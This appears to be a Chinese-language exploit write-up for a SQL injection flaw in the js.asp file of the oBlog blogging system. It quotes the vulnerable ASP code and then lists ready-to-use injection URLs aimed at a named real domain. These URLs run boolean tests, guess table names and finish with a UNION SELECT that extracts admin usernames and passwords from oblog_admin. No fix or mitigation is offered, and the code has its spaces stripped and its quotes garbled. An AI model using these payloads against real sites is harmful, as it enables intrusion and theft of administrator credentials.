来源:DeepenStudy
漏洞文件:js.asp
<%
Dimoblog
setoblog=newclass_sys
oblog.autoupdate=False
oblog.start
dimjs_blogurl,n
js_blogurl=Trim(oblog.CacheConfig(3))
n=CInt(Request(”n”))
ifn=0thenn=1
selectcaseCInt(Request(”j”))
case1
calltongji()
case2
calltopuser()
case3
calladduser()
case4
calllistclass()
case5
callshowusertype()
case6
calllistbestblog()
case7
callshowlogin()
case8
callshowplace()
case9
callshowphoto()
case10
callshowblogstars()
Case11
Callshow_hotblog()
Case12
Callshow_teams()
Case13
Callshow_posts()
Case14
Callshow_hottag()
case0
callshowlog()
endselect
****************省略部分代码******************
Subshow_posts()
Dimteamid,postnum,l,u,t
teamid=Request(”tid”)
postnum=n
l=CInt(Request(”l”))
u=CInt(Request(”u”))
t=CInt(Request(”t”))
Dimrs,sql,sRet,sAddon
Sql=”selectTop”&postnum&”teamid,postid,topic,addtime,author,useridFromoblog_teampostWhereidepth=0andisdel=0”
Ifteamid<>“”Andteamid<>“0″Then
teamid=Replace(teamid,”|”,”,”)
Sql=Sql&”AndteamidIn(”&teamid&“)”
EndIf
Sql=Sql&”orderbypostidDesc”
Setrs=oblog.Execute(Sql)
sRet=”
”
DoWhileNotrs.Eof
sAddon=”"
*sRet=sRet&“”&oblog.Filt_html(Left(rs(2),l))&“”
Ifu=1ThensAddon=rs(4)
ift=1Then
IfsAddon<>“”ThensAddon=sAddon&“,”
sAddon=sAddon&rs(3)
EndIf
IfsAddon<>“”ThensAddon=”(”&sAddon&“)”
sRet=sRet&sAddon&“
”
rs.Movenext
Loop
Setrs=Nothing
sRet=sRet&“
”
Response.writeoblog.htm2js(sRet,True)
EndSub
调用show_posts()过程必须要符合上面的参数n=1,j=13
(”&teamid&“)
http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1
http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1)and1=1and(1=1返回正常
http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1)and1=1and(1=2返回异常
猜管理员表名
http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1)and查询语句and(1=1
Sql=”selectTop”&postnum&”teamid,postid,topic,addtime,author,useridFromoblog_teampostWhereidepth=0andisdel=0”
http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1)and1=2unionselect1,2,3,4,5,6fromoblog_adminwhereid=(1
document.write('
*
‘);
gid=1跟pid=2里的1,2就是了直接替换里面的1,2为username,password
http://www.oblog.com.cn/js.asp?n=1&j=13&tid=1)and1=2unionselectusername,password,3,4,5,6fromoblog_adminwhereid=(1